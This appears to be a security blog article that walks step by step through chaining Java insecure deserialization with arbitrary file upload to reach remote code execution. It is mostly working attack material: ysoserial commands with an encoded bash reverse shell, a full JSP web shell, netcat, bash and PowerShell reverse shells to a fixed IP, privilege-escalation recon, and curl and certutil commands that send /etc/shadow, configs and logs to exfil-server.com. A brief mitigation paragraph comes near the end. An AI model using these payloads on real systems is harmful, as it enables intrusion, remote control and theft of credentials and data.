Listen to this Post

Introduction:
In the complex landscape of web application security, vulnerabilities rarely exist in isolation. The true danger emerges when attackers chain multiple, seemingly lower-severity flaws to create a devastating attack path. This article deconstructs a critical P2 finding where an attacker combined Insecure Deserialization and Arbitrary File Upload to achieve unauthenticated Remote Code Execution (RCE) and full SYSTEM-level compromise on a Java-based service.
Learning Objectives:
- Understand the mechanics of Java object deserialization attacks and how to exploit them.
- Learn how to weaponize an arbitrary file upload vulnerability beyond simple defacement.
- Master the commands and techniques to detect, exploit, and mitigate this potent vulnerability chain.
You Should Know:
1. Identifying Java Deserialization Endpoints
The first step is locating endpoints that accept serialized Java objects. These often have distinctive characteristics in HTTP requests.
Example HTTP Request with Serialized Data (Often Base64 Encoded) POST /api/v1/process HTTP/1.1 Host: vulnerable-app.com Content-Type: application/x-java-serialized-object rO0ABXQAVklF... (abbreviated Base64 serialized object data)
Step-by-step guide: Intercept application traffic using a proxy like Burp Suite. Look for POST requests containing lengthy, base64-like strings in the body or in specific cookies (e.g., JSESSIONID). The Content-Type headers might also be a clue, but often they are misconfigured. Tools like `ysoserial` can then generate payloads to test these endpoints.
2. Crafting the Deserialization Payload with ysoserial
Once a vulnerable endpoint is found, you use a tool like `ysoserial` to generate a malicious serialized object that executes OS commands.
Generating a payload that runs a calc.exe (Proof-of-Concept)
java -jar ysoserial.jar CommonsCollections4 'calc.exe' > payload.ser
For a reverse shell, command must be encoded appropriately
java -jar ysoserial.jar CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84MCAwPiYx}|{base64,-d}|{bash,-i}' > shell.ser
Step-by-step guide: Ysoserial uses “gadget chains” (e.g., CommonsCollections4) from libraries within the target application. You must identify the correct chain for the target’s classpath. The output is a binary file (payload.ser) which you then base64-encode and submit in the vulnerable HTTP parameter.
3. Weaponizing Arbitrary File Upload
An arbitrary file upload flaw allows the attacker to place a malicious JSP web shell on the server, but they need to know the upload path. The deserialization payload can be used to reveal this.
Linux command to find web root directories, injected via deserialization find / -name ".jsp" -type f 2>/dev/null | head -n 5 Windows command alternative dir /s C:\.jsp | findstr /i "webapps wwwroot"
Step-by-step guide: Exploit the deserialization vulnerability to execute a system command that discovers the absolute path where uploaded files are stored. This turns the file upload from a blind vulnerability into a known location for deploying a web shell.
4. Deploying a Web Shell via Upload
With the upload path known, use the file upload functionality to deploy a JSP web shell.
Example JSP Web Shell (cmd.jsp)
<%@ page import="java.util.,java.io."%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
Step-by-step guide: This code is saved as a `.jsp` file and uploaded through the vulnerable functionality. Once uploaded, you can access it at `http://vulnerable-app.com/uploads/cmd.jsp?cmd=whoami` to execute commands directly.
5. Establishing a Reverse Shell
A simple web shell is limited. Use it to execute a more powerful reverse shell payload for interactive access.
Using the web shell to fetch and execute a netcat reverse shell
cmd=/usr/bin/nc -e /bin/bash 192.168.1.2 4444
For a more robust Linux reverse shell
cmd=bash -c 'bash -i >& /dev/tcp/192.168.1.2/4444 0>&1'
Windows reverse shell using PowerShell
cmd=powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Step-by-step guide: Before executing these commands, start a netcat listener on your attack machine: `nc -nlvp 4444`. Then, trigger the reverse shell by passing the appropriate command to your deployed web shell via the `cmd` parameter.
6. Privilege Escalation to SYSTEM/NT AUTHORITY
The initial shell often runs under a limited service account. The final step is escalating privileges to gain full control over the host.
On Windows, check for common privilege escalation vectors whoami /priv systeminfo accesschk.exe /accepteula -u -s On Linux, check sudo permissions and SUID binaries sudo -l find / -perm -4000 -type f 2>/dev/null
Step-by-step guide: These commands help identify misconfigurations. For example, a service running as SYSTEM might have weak folder permissions, allowing you to replace its DLLs. Or a `sudo` rule might allow the service account to run a specific command as root without a password.
7. Exfiltration and Debug Log Harvesting
With SYSTEM-level access, you can now exfiltrate sensitive data, including application debug logs that may contain secrets for other systems.
On Windows, using built-in certutil to exfiltrate a file certutil -encode loot.zip encoded.txt & findstr /V "CERTIFICATE" encoded.txt > stager.txt & powershell Invoke-WebRequest -Uri http://exfil-server.com/collect -Method Post -InFile stager.txt On Linux, using curl to exfiltrate data curl -X POST --data-binary @/var/app/logs/debug.log http://exfil-server.com/collect tar -czf loot.tar.gz /etc/passwd /etc/shadow /app/config && curl -X POST --data-binary @loot.tar.gz http://exfil-server.com
Step-by-step guide: These commands package and exfiltrate data to a server controlled by the attacker. The Windows example uses `certutil` to base64 encode a file before sending it to avoid binary data corruption in a POST request.
What Undercode Say:
- The Sum is Greater Than The Parts: Alone, a blind file upload or a deserialization bug might be rated lower. Chained together, they form a critical, system-compromising threat. Penetration tests must actively search for these chains.
- Context is King for Payloads: The success of `ysoserial` is entirely dependent on the libraries (gadget chains) present on the target server. Reconnaissance and careful testing are required; a payload that works on one endpoint may not work on another.
This vulnerability chain is a classic example of a “deathstar” attack path. The mitigation is twofold: first, implement robust input validation that rejects any serialized objects from untrusted sources; use safe serialization formats like JSON instead. Second, enforce strict controls on file uploads, including validating file type by content (not just extension), storing them outside the web root, or serving them via a separate domain with no script execution privileges.
Prediction:
The sophistication of vulnerability chaining will only increase with the adoption of AI-powered penetration testing tools. These systems will be able to automatically map application attack surfaces, identify discrete vulnerabilities, and proactively chain them together to demonstrate real-world impact with minimal human intervention. This will force a shift in bug bounty programs and risk assessments from scoring individual CVEs to rating the overall attack resilience of an application’s architecture, making defense-in-depth not just a best practice but an absolute necessity.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Hs Ninja – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


